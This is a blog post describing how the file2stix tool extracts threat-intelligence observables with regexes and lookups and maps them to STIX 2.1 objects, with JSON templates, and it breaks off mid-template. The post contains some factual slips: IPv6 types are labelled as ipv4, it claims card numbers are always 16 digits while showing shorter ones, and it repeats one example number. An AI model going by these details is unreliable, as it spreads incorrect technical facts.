If you are reading this blog post via a 3rd party source it is very likely that many parts of it will not render correctly. Please view the post on signalscorps.com for the full interactive viewing experience.
In this post I will describe how observables are extracted from documents and converted to STIX objects by file2stix.
Once the plaintext file has been created, extractions are carried out in two ways
- Default extractions (built into default code, always happen unless file2stix is asked to ignore)
- Regular expressions
- Lookups
- Custom extractions (added by user, used only if file2stix explicitly instructed to do so)
- Lookups
- Regular expressions
Lookups vs Regular Expressions
If you look at the extractions
file structure for file2stix;
extractions
default
regex
IPv4.txt
- …
regex-mapping.csv
lookups
malware.csv
- …
enrichments
ATTACK
enterprise.csv
mobile.csv
ics.csv
CAPEC
local
regex
custom-regex.txt
- …
regex-mapping.csv
lookups
custom-regex.csv
- …
You can see that there are both default and local versions of lookup and regex files.
Everything under default
is what ships with file2stix (and will be overwritten on updates). For user changes or additions, local
can be used to avoid data loss on upgrade.
So what is the difference between regex
and lookup
files?
Every file (except for regex-mapping.csv
) under extractions/*/regex
is a regular expression extraction. Each extraction (regex) is given its own filename (e.g. ipv4.txt
contains extractions for IPv4s).
ipv4.txt
currently looks as follows;
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
To ensure the correct STIX 2.1 mapping is performed, each regular expression must be linked to a supported STIX 2.1 object type. This is done in the regex-mapping.csv
file. The regex-mapping.csv
has the schema regex-filename
,stix-object
Continuing the ipv4 example, this would be mapped in regex-mapping.csv
as follows;
ipv4.txt,IPv4Only
This means any object detected using the regex in ipv4.txt
will be mapped to the ipv4
file2stix created STIX object (as described later in this post).
file2stix currently supports the following default observable extraction types to create STIX Objects from regular expressions (in brackets is the file2stix classification):
- ipv4 (
IPv4Group
)- ipv4 only (
IPv4Only
), e.g.198.51.100.3
- ipv4 with CIDR (
IPv4CIDR
), e.g.198.51.100.0/24
- ipv4 with port (
IPv4Port
), e.g.198.51.100.0:80
- ipv4 only (
- ipv6 (
IPv6Group
)- ipv4 only (
IPv6Only
), e.g.2001:0db8:85a3:0000:0000:8a2e:0370:7334
- ipv4 with CIDR (
IPv6CIDR
), e.g.2002::abcd:ffff:c0a8:101/64
- ipv4 with port (
IPv6Port
), e.g.[2001:0db8:85a3:0000:0000:8a2e:0370:7334]:80
- ipv4 only (
- Domain (
DomainNameGroup
)- Domain (
DomainNameOnly
), e.g.example.com
- Sub-Domain (
DomainNameSub
), e.g.a.sub.domain.example.com
- Domain (
- URL (
URLGroup
)- URL full (
URLFull
) e.g.https://example.com/research/index.html
- URL part (
URLPart
) e.g.https://example.com/research/
- URL full (
- File name (
FileName
), e.g.badfile.exe
- Directory Path (
DirectoryPathGroup
)- Windows (
DirectoryPathWindows
), e.g.C:\Windows\System32
- UNIX (
DirectoryPathUNIX
), e.g./System/Library/LaunchDaemons
- Windows (
- File hash (
FileHashGroup
)- MD5 hash (
FileHashMD5
), e.g.79054025255fb1a26e4bc422aef54eb4
- SHA-1 hash (
FileHashSHA-1
), e.g.86F7E437FAA5A7FCE15D1DDCB9EAEAEA377667B8
- SHA-256 hash (
FileHashSHA-256
), e.g.F4BF9F7FCBEDABA0392F108C59D8F4A38B3838EFB64877380171B54475C2ADE8
- SHA-512 hash (
FileHashSHA-512
), e.g.1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546f369fbbbce8c12cfc7957b2652fe9a75
- SSDEEP hash (
FileHashSSDeep
), e.g.24:Ol9rFBzwjx5ZKvBF+bi8RuM4Pp6rG5Yg+q8wIXhMC:qrFBzKx5s8sM4grq8wIXht
- SHA3-256 hash (
FileHashSHA3-256
) - SHA3-512 hash (
FileHashSHA3-512
)
- MD5 hash (
- Email Address (
EmailAddress
), e.g.[email protected]
- MAC Address (
MacAddress
), e.g.d2:fb:49:24:37:18
- Windows Registry Key (
WindowsRegistryKey
), e.g.HKEY_LOCAL_MACHINE\Software\Classes
- User Agent (
UserAgent
), e.g.Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113
- Autonomous System Number (ASN) (
AutonomousSystemNumber
), e.g.ASN15139
/ASN 15139
/AS15139
/AS 15139
- Cyptocurrency (
CryptocurrencyGroup
)- Bitcoin address (BTC) (
CryptocurrencyBTC
), e.g.3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5
- Ethereum address (ETH) (
CryptocurrencyETH
), e.g.0xb794f5ea0ba39494ce839613fffba74279579268
- Monero address (XMR) (
CryptocurrencyXMR
), e.g.888tNkZrPN6JsEgekjMnABU4TBzc2Dt29EPAvkRxbANsAnjyPbb3iQ1YBRk1UXcdRsiKc9dhw
- Bitcoin address (BTC) (
- CVE (
CVE
), e.g.CVE-2022-00001
- CVE’s always follow the format
CVE-YYYY-DDDDD
, whereYYYY
is the year andDDDDD
is the numeric ID of the CVE.
- CVE’s always follow the format
- CPE (
CPE
), e.g.cpe:2.3:o:apple:mac_os_x:10.1.3:*:*:*:*:*:*:*
- Countries (
CountryGroup
)- Country Name (
CountryName
), e.g.United Kingdom
- Country Code (
CountryCode
), e.g.UK
- Country Name (
- Credit Card (
CreditCardGroup
)- Mastercard (
CreditCardMastercard
), e.g.5555555555554444
- Visa (
CreditCardVisa
), e.g.4242424242424242
- Amex (
CreditCardAmex
), e.g.378282246310005
- Union Pay (
CreditCardUnionPay
), e.g.6200000000000005
- Diners (
CreditCardDiners
), e.g.3056930009020004
- JCB (
CreditCardJCB
), e.g.6011111111111117
- Discover (
CreditCardDiscover
), e.g.6011111111111117
- Card Numbers are always 16 digits long and the type of card can be determined by the first four digits (e.g.
4242
for Visa). Therefore it is easy to identify card numbers using regular expressions.
- Mastercard (
- International Bank Account Number (IBAN) (
IBAN
), e.g.DE29100500001061045672
/GB94BARC10201530093459
- IBAN numbers start with the country code. The country determines the length of the IBAN number and the structure (they are not all the same). However, as each countries structure must follow the same format a regular expression can be used to match all IBAN country variations.
- YARA Rule (
YaraRule
), e.g. See example later in this post - SIGMA Rule (
SigmaRule
), e.g. See example later in this post
More detail on those, later.
That covers regular expression extractions, but one of the design decisions for file2stix was to make it easy for users to write in their own extractions, even if they don’t understand regex, in a modular way. This is where lookups come in.
Lookups ask the user to define a string of text for extraction (e.g. “bad actor
”) and a supported STIX mapping in a CSV.
"ryuk",malware
"darkhotel",malware
"patch",course-of-action
The following STIX 2.1 Objects are supported by each unique custom extractions generated by a lookup:
- Attack Pattern (
attack-pattern
). Values set:name
: value extracted by regex
- Campaign (
campaign
). Values set:name
: value extracted by regex
- Course of Action (
course-of-action
). Values set:name
: value extracted by regex
- Infrastructure (
infrastructure
). Values set:name
: value extracted by regexinfrastructure_types
: unknown
- Intrusion Set (
intrustion-set
). Values set:name
: value extracted by regex
- Malware (
malware
). Values set:name
: value extracted by regexmalware_types
: unknownis_family
: true
- Threat Actor (
threat-actor
). Values set:name
: value extracted by regexthreat_actor_types
: unknown
- Tool (
tool
)name
: value extracted by regextool_types
: unknown
e.g. to search a document for the string “RYUK” and create a Malware STIX 2.1 SDO if a match is identified;
"ryuk",malware
The resulting malware STIX object for the extraction from the lookup would look as follows;
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"name": "Ryuk",
"malware_types": ["unknown"],
"is_family": true
}
There are also two types of special default extractions that are performed using lookups from existing knowledge-bases;
- MITRE ATT&CK (
MITREAttackGroup
)- Enterprise ATT&CK (
MITREEnterpriseAttack
) - Mobile ATT&CK (
MITREMobileAttack
) - ICS ATT&CK (
MITREICSAttack
)
- Enterprise ATT&CK (
- MITRE CAPEC (
MITRECapec
)
For these, file2stix pulls in the remote knowledge-bases for ATT&CK and CAPEC respectively to search through for extractions. I will also explain that later in this post.
A brief tangent on GPT for regular expression creation
Many of you reading this might be attempting to create your own regular expressions for file2stix. In my previous posts I’ve talked about using GPT to create observable extractions from plain text.
GPT is also helpful in creating regular expressions for such extractions (and explaining their logic!). Take for example IP addresses…
Input
Write a regular expression that detects IP addresses
Output
Sure! Here’s a regular expression that can be used to detect IP addresses:
\b(?:\d{1,3}\.){3}\d{1,3}\b
Explanation:
\b
matches a word boundary to ensure that the IP address is not part of a larger word.(?:\d{1,3}\.){3}
matches a group of three digits followed by a dot, repeated three times. This accounts for the first three octets of the IP address.\d{1,3}
matches the fourth octet of the IP address, which can have 1-3 digits.\b
matches another word boundary to ensure the IP address is complete.
This regular expression will match IP addresses in the format xxx.xxx.xxx.xxx
, where each x
represents a number from 0 to 255.
Please note that this regular expression alone cannot verify whether an IP address is valid or not (e.g., it will match 999.999.999.999
, which is not a valid IP address). It only detects patterns that resemble IP addresses.
Input
Please make sure the regular expression ensures the IP address is valid
Output
Certainly! Here’s an updated regular expression that not only detects IP addresses but also validates whether they are valid:
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
Explanation:
\b
matches a word boundary to ensure that the IP address is not part of a larger word.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.
matches the first three octets of the IP address. It includes three alternatives separated by|
:25[0-5]
matches numbers between 250 and 255.2[0-4][0-9]
matches numbers between 200 and 249.[01]?[0-9][0-9]?
matches numbers between 0 and 199, allowing for leading zeros.\.
matches the dot separator between octets.
- The previous group is repeated three times with
(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.
to match the first three octets. (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)
matches the fourth octet of the IP address, using the same alternatives as before.\b
matches another word boundary to ensure the IP address is complete.
This updated regular expression will not only detect IP addresses in the format xxx.xxx.xxx.xxx
but will also validate that each octet is a valid number between 0 and 255.
Input
Please also identify IP addresses with ports in the regular expression (e.g. 1.1.1.1:80
)
Output
Certainly! Here’s an updated regular expression that detects IP addresses with optional ports:
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(?::\d{1,5})?\b
Explanation:
\b
matches a word boundary to ensure that the IP address is not part of a larger word.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.
matches the first three octets of the IP address, just like before.- The previous group is repeated three times with
(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.
to match the first three octets. (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)
matches the fourth octet of the IP address, using the same alternatives as before.(?::\d{1,5})?
matches an optional colon followed by 1 to 5 digits, representing the port number.\b
matches another word boundary to ensure the IP address is complete.
This updated regular expression will detect IP addresses in the format xxx.xxx.xxx.xxx
and also IP addresses with optional ports in the format xxx.xxx.xxx.xxx:port
, where each x
represents a number from 0 to 255, and port
represents a valid port number.
Input
Can you also include the detection of CIDR ranges in the extractions (e.g. 1.1.1.1/24
). The regular expression should optionally detect ports OR CIDRs please?
Output
Certainly! Here’s an updated regular expression that detects IP addresses with optional ports or CIDR ranges:
\b((?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(?::\d{1,5})?(?:\/(?:3[0-2]|[12]?[0-9]))?\b
Explanation:
\b
matches a word boundary to ensure that the IP address is not part of a larger word.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.
matches the first three octets of the IP address, just like before.- The previous group is repeated three times with
(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.
to match the first three octets. (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)
matches the fourth octet of the IP address, using the same alternatives as before.(?::\d{1,5})?
matches an optional colon followed by 1 to 5 digits, representing the port number.(?:\/(?:3[0-2]|[12]?[0-9]))?
matches an optional forward slash followed by a number between 0 and 32, representing the CIDR range.\b
matches another word boundary to ensure the IP address is complete.
This updated regular expression will detect IP addresses in the format xxx.xxx.xxx.xxx
, IP addresses with optional ports in the format xxx.xxx.xxx.xxx:port
, and IP addresses with optional CIDR ranges in the format xxx.xxx.xxx.xxx/cidr
, where each x
represents a number from 0 to 255, port
represents a valid port number, and cidr
represents a valid CIDR range.
Hopefully this gives you some inspiration for building your own regular expressions. Back to file2stix…
Dealing with similar regular expression extractions
Regular expressions pattern match. A lot of default regular expression extraction tools can be found online for common observables (validators is just one example).
Whilst fairly accurate most of the time, there are clear exceptions due to similarities in what observables look like that need additional logic to be accounted for to ensure the correct extractions are made.
Here are some of the similarities I’ve identified, and how file2stix deals with them…
Domain (+ URLs and emails) vs. filenames
Regular expressions can incorporate known top level domain extensions (e.g. .com
). Lots of public TLD dictionaries exist to do this.
Similarly dictionaries of file extension types also exist to be used in the file name extractions.
However, with the proliferation of new top level domains and file extensions, rightly or wrongly (e.g. was .zip
really a good idea for security!?!,) over the last few years can make it hard to determine domains vs. filenames with extensions. For example, myreport.zip
could be identified as both a filename and domain.
Luckily in many cases (but not always) domains in intelligence reports are usually written with the appropriate network protocol (typically either http://
and https://
, or @
in the case of emails) which can be included in the regular expression.
domain.zip
Would only extract as a filename.
https://domain.zip
Would only extract as a domain name.
[email protected]
Would extract as a domain name and an email address.
Domain vs. subdomain (vs. filenames)
Domain names can be incorporate sub parts (sub domain). Lets imagine the plaintext file contains the following
this is my file with https://a.sub.domain.zip
When a subdomain is detected, domain or filename extractions are ignored. So this text would only extract the subdomain (a.sub.domain.zip
).
Filetypes
Filetypes generally only contain a single .
so…
this is my file with a.sub.domain.zip and a domain.zip
Would only extract one domain.zip
filename. The string a.sub.domain.zip
would be completely ignored.
URLs vs. UNIX directory paths vs. Filenames
Lets imagine we have the URL https://example.com/research/index/example.html
in a text file.
A human can determine this as a URL https://example.com/research/index/example.html
. That said it could also be considered a domain (example.com
), UNIX filepath (/research/index/
), and filename example.html
.
When a full URL is detected (e.g. https://example.com/research/index/example.html
), only a domain (e.g. example.com
) and URL observable (e.g. https://example.com/research/index/example.html
) will be extracted (and not filepath or filename).
Similarly when a partial URL is detected (e.g. https://example.com/research/index/
), only a domain (e.g. example.com
) and URL observable (e.g. https://example.com/research/index/example.html
) will be extracted (and not filepath or filename).
Windows Registry Key and Windows filepath
C:\Windows\System32
can look similar to Windows Registry Keys HKEY_LOCAL_MACHINE\Software\Classes
.
To help solve this problem, we can also use a list of known prefixes for each observable type (e.g. C:
or HKEY_LOCAL_MACHINE
).
For Windows Registry Key there are seven predefined root keys (e.g. HKEY_LOCAL_MACHINE
) that must be present: HKEY_CLASSES_ROOT
(or HKCR
), HKEY_CURRENT_USER
(HKCU
), HKEY_LOCAL_MACHINE
(or HKLM
), HKEY_USERS
(HKU
), HKEY_CURRENT_CONFIG
(or HKCC
), HKEY_PERFORMANCE_DATA
, HKEY_DYN_DATA
. These are then followed by a directory path with directories separated by \
.
User Agent vs. UNIX filepath
User agents can be fairly complex. For example, Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36
.
User Agents should follow RFC7231.
The problem here is that there is no defined prefix for user agent strings, they can be anything.
There are a few example regular expressions on the internet to extract user agent patterns which hard-code the prefix (Mozilla
, AppleWebKit
, etc) and format. file2stix uses a similar approach.
As you can see, parts of the user agent string look like UNIX paths (e.g. Chrome/58.0.3029.83
). When a user agent is detected, no UNIX paths are extracted for any part of the user agent.
Filehash vs Cryptocurrency transactions
Many cryptocurrencies use common hash algorithms to register transactions on the blockchain (e.g. BTC uses SHA-256). These same algorithms are used to fingerprint malware. There is no concrete way to differentiate between a cryptocurrency transaction and malware fingerprint.
Therefore generic extractions like this would detect both a file hash and a BTC cryptocurrency observable for SHA-256 hashes in an input.
What makes it worse is many of the resulting hashes are not fixed in length;
SHA256 produces a string of 32 bytes. This string is usually represented in the hexadecimal format (as 64 characters [0-9a-f]), but it’s not a requirement. One may choose to use a different encoding to make the produced string shorter.
Source: SuperUser
Currently file2stix extracts the following cryptocurrency type;
- BTC (SHA-256)
- ETH (KECCAK-256)
- XMR (RandomX)
And generic filehash types;
- MD5
- SHA-1
- SHA-256
- SHA-512
- SHA3-256
- SHA3-512
- SSDEEP
Therefore only BTC creates an issue with collisions.
As such, a conscious decision was made that both a file hash and a cyptocurrency will be extracted if a sha256 is detected.
IPv4/6 port (destination vs. source)
When a port is reported, it could be either a source or destination port (considering only the regular expression extraction).
Generally, threat intel research reports cover destination ports when reported with an IP (they report on what was seen). Therefore, a conscious decision was made that file2stix always classifies IPs with port numbers as showing destination ports.
Countries
English country names and codes can be identified by standard definition dictionaries of ISO codes.
file2stix uses ISO 2, ISO 3, and country names shown in this table for extraction.
A concious decision was made to only include English spelt country names at present (namely for simplicity).
Tracking multiple extractions
When a regular expression detects a match an extraction is made and STIX objects created. It is very common for the same extraction to appear multiple times in a single report (e.g. 1.1.1.1
printed 20 times in a report).
Typically, you’d only want to extract this once (1 Indicator SCO) versus many times (20 Indicator SCOs). As such, file2stix extracts the value 20 times, but only creates one object.
file2stix also counts the position of the first and last character in the plaintext file generated by file2stix. To demonstrate, if the extraction was 1.1.1.1
(from default regex directory, ipv4.txt file) and the converted plaintext file looked as follows;
my ip address is: 1.1.1.1
The first position would be 18 (the first digit of the extraction, 1, is position 18 counting from 0). The last position of the extraction would be 24.
Now working an example of a duplicate extraction,
my ip address is: 1.1.1.1 1.1.1.1
The position for the second extraction would be 26 and 32, respectively, but only one IPv4 object would be created.
Warning Lists
Warning Lists identify potentially benign file2stix extractions. Do not be confused by the name; Warning Lists in file2stix are the equivalent of whitelists in other products.
file2stix uses MISP Warning Lists (using PyMISPWarningLists) to identify potential extractions that should be whitelisted. These are synced to file2stix and each list is placed in the warning-lists/default/
directory following the same structure as the PyMISPWarningLists repository.
Extracted values that match a Warning List are still converted to STIX 2.1 Objects, however, will contain external references listing the Warning Lists the extracted value matches with and will also contain indicator_types
= benign
.
For example;
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--fb715301-acf3-4add-a70a-2b96f5ac15f5",
"created": "2022-09-07T06:18:21.997149Z",
"modified": "2022-09-08T06:13:24.191194Z",
"name": "Domain: google.com",
"indicator_types": [
"unknown",
"benign"
],
"pattern": "[ domain-name:value = 'google.com' ]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-09-07T06:18:21.997149Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
},
{
"source_name": "MISP Warning List: <LIST NAME>",
"url": "<MISP WARNING LIST GITHUB URL>",
"description": "<MISP WARNING LIST DESCRIPTION>",
},
{
"source_name": "MISP Warning List: <LIST NAME>",
"url": "<MISP WARNING LIST GITHUB URL>",
"description": "<MISP WARNING LIST DESCRIPTION>",
}
]
}
Note, MISP Warning Lists contain a type
value (defined in the Warning List JSON). file2stix treats each Warning List differently, depending on its type as follows;
string
: extracted observables must be exact match to Warning List value (e.g. warning list: google.com -> observable: google.com = match)substring
: extracted observable must contain Warning List value (e.g. warning list: google -> observable: api.google.com = match)hostname
: extracted observable must contain Warning List valuecidr
: extracted observable must be exact match to Warning List valueregex
: file2stix does not consider warning lists of typeregex
By default file2stix will compare all MISP Warning lists. You must set this manually either by specifying all warning lists, or the specific ones you’d want to use.
Custom Warning Lists
You can also create your own Warning Lists. Custom Warning Lists must follow the MISP Warning List schema.
file2stix will first check the Warning List is in the expected MISP Warning List format. If not, it will return an error and will not process the file.
If you look at the warning-lists
file structure for file2stix;
warning_lists
default
- PyMISPWarningLists
local
- Custom warning lists for user
Use of Note SDOs
The STIX 2.1 Note SDO is primarily used to provide metadata for each extraction. The note SDO is used in two places.
For report metadata
To help debug issues, but also to help remind a user what settings they used to process the file a Note SDO connected to the Report SDO created for the input is created as follows;
{
"type": "note",
"spec_version": "2.1",
"id": "note--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"abstract": "file2stix user configoration data",
"content": "This note captures the user settings entered for processing the report.",
"object_refs": ["<REPORT ID>"],
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
],
"extension": {
"extension-definition--c42a2e0c-8347-4eb7-ab08-ae1e9740ebf7": {
"extension_type": "property-extension",
"user_settings": {
"owner": "user--<USER UUID>",
"job_uuid": "<UUID OF THE JOB>",
"input_filename": "<FILENAME>",
"input_filetype": "<FILETYPE>",
"processed_filename": "file--<FILE UUID>",
"job_uuid": "job--<JOB UUID>",
"error_handling": "<HARD OR SOFT>",
"defang": "<IF DEFANG SET IS TRUE ELSE FALSE>",
"confidence": "<IF CONFIDENCE SET, ELSE 0 IF NOT SET>",
"tlp": "<IF TLP SET EXPLITLY, THE TLP LEVEL, ELSE WHITE>",
"error_handling": "<IF ERROR HANDLING SET, else hard>",
"output_location": "<LOCAL PATH PRINTED OR S3 BUCKET PATH>",
"misp_warning_lists": [
"<MISP WARNING LISTS SELECTED>",
"<MISP WARNING LISTS SELECTED>"
],
"custom_warning_lists": [
"<CUSTOM WARNING LISTS SELECTED>",
"<CUSTOM WARNING LISTS SELECTED>"
]
},
"file2stix_information": {
"host": "<HOST OF MACHINE>",
"api_version": "<API VERSION USED>"
}
}
}
}
Note, this information is also reported by the jobs API endpoint (described in the next post).
For extraction metadata
To help track extracted values, again, mainly for troubleshooting purposes, for every SDO created for an extraction, a Note SDO is used.
{
"type": "note",
"spec_version": "2.1",
"id": "note--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"abstract": "Extraction Data for <SDO ID CREATED FOR EXTRACTION>",
"content": "This note indicates the regular expression and location of the extraction for <SDO ID CREATED FOR EXTRACTION>.",
"object_refs": ["<SDO ID CREATED FOR EXTRACTION>"],
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
],
"extension": {
"extension-definition--16b114d1-371d-4587-ba7d-03d0e5cf71cf": {
"extension_type": "property-extension",
"extraction_information": {
"type": "<REGEX OR LOOKUP>",
"location": "<DEFAULT OR LOCAL>",
"file": "<FILENAME OF EXTRACTION>",
"positions": [
{
"start_position": "<LOCATION OF FIRST CHARACHTER>",
"end_position": "<LOCATION OF LAST CHARACHTER>"
},
{
"start_position": "<LOCATION OF FIRST CHARACHTER>",
"end_position": "<LOCATION OF LAST CHARACHTER>"
}
]
}
}
}
}
STIX 2.1 Object creation logic for extractions
file2stix uses the STIX2 Python library for all STIX 2.1 object generation (except for ATT&CK and CAPEC).
Generally speaking, but not in every case, an extraction will create 4 things;
- An SDO (with an SCO in the pattern)
- A corresponding SCO (from the SDO)
- An SRO (between SCO [2.] and SDO [1.])
- An SRO (between SDO [1.] and Report for the input (see part 1))
As mentioned, SCOs are created from Patterns in SDOs. e.g. [ipv4-addr:value='1.1.1.1']
become an SCO of "type": "ipv4-addr
with a "value": "1.1.1.1"
.
That means that any extracted observable with the same type and value (e.g. ipv4-addr
+1.1.1.1
) will have the same id
whatever the SDO it was generated from (because the STIX2 library uses these two values to generate the UUIDv5). This makes it possible to create links between reports uploaded using shared SCOs.
This only applies to SCOs. All SROs and SDOs (created by file2stix) will have unique id
s because they are generated using random UUIDv4s.
Note on error handling
It’s important to note, if you use custom regex or lookup extractions that the value you’re searching for maps properly to the STIX objects describe below. For example, if you map a domain extraction (e.g. example.com
to an IPv4 Object) you will receive an error.
By default, file2stix will hard handle errors, that is; any errors to cause the extraction to fail, in which case as soon as an error is seen the job will be aborted and there will be no output. In which case you must fix what is causing the error and rerun the job.
You can explicitly set file2stix to soft handle errors, that is; report them in the logs, ignore the extraction/object creation that fails, but will still continue with the extraction of other objects.
1.1 IPv4 Address (IPv4Only
and IPv4CIDR
)
Creates STIX 2.1 objects:
STIX 2.1 indicator
SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv4: <EXTRACTED IPV4 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv4-addr:value = '<EXTRACTED IPV4 OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv4-addr
SCO
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV4 OBSERVABLE VALUE>"
}
1.2 IPv4 Address Observables with port (IPv4Port
)
Creates STIX 2.1 objects:
indicator
(withrelationship
toreport
)ipv4-addr
) (withrelationship
toindicator
)network-traffic
) (withrelationship
toindicator
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv4: <EXTRACTED IPV4 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv4-addr:value = '<EXTRACTED IPV4 OBSERVABLE VALUE>' AND network-traffic:dst_port = '<EXTRACTED IPV4 PORT VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv4-addr and network-traffic SCO
{
"type": "ipv4-addr",
"spec_version": "2.1",
"id": "ipv4-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV4 OBSERVABLE VALUE>"
}
{
"type": "network-traffic",
"spec_version": "2.1",
"id": "network-traffic--<GENERATED BY STIX2 LIBRARY>",
"dst_ref": "ipv4-addr--<IPV4 OBJECT ID>",
"dst_port": "<EXTRACTED IPV4 PORT VALUE>",
"protocols": [
"ipv4"
]
}
2.1 IPv6 Observables (IPv6Only
and IPv6CIDR
)
Creates STIX 2.1 objects:
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
"created": "<REPORT CREATED PROPERTY VALUE>",
"modified": "<REPORT MODIFIED PROPERTY VALUE>",
"indicator_types": [
"unknown",
"<IF MATCHES WARNING LIST BENIGN>"
],
"name": "ipv6: <EXTRACTED IPV6 OBSERVABLE VALUE>",
"pattern_type": "stix",
"pattern": "[ ipv6-addr:value = '<EXTRACTED IPV6 OBSERVABLE VALUE>' ]",
"valid_from": "<REPORT CREATED PROPERTY VALUE>",
"object_marking_refs": [
"marking-definition--<TLP LEVEL SET>"
],
"external_references": [
{
"source_name": "file2stix",
"external_id": "report--<REPORT OBJECT ID>",
"description": "This object was created using file2stix from the Signals Corps for report--<REPORT OBJECT ID>, filename <FILENAME>.",
"url": "https://<HOST>/reports/report--<REPORT OBJECT ID>"
}
]
}
STIX 2.1 ipv6-addr SCO
{
"type": "ipv6-addr",
"spec_version": "2.1",
"id": "ipv4-addr--<GENERATED BY STIX2 LIBRARY>",
"value": "<EXTRACTED IPV6 OBSERVABLE VALUE>"
}
2.2 IPv6 Observables with port (IPv6Port
)
Creates STIX 2.1 objects:
indicator
(withrelationship
toreport
)ipv6-addr
) (withrelationship
toindicator
)network-traffic
) (withrelationship
toindicator
)
STIX 2.1 indicator SDO
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--<GENERATED BY STIX2 LIBRARY>",
"created_by_ref": "identity--<IF TLP RED/AMBER/GREEN USER IDENTITY ID>",
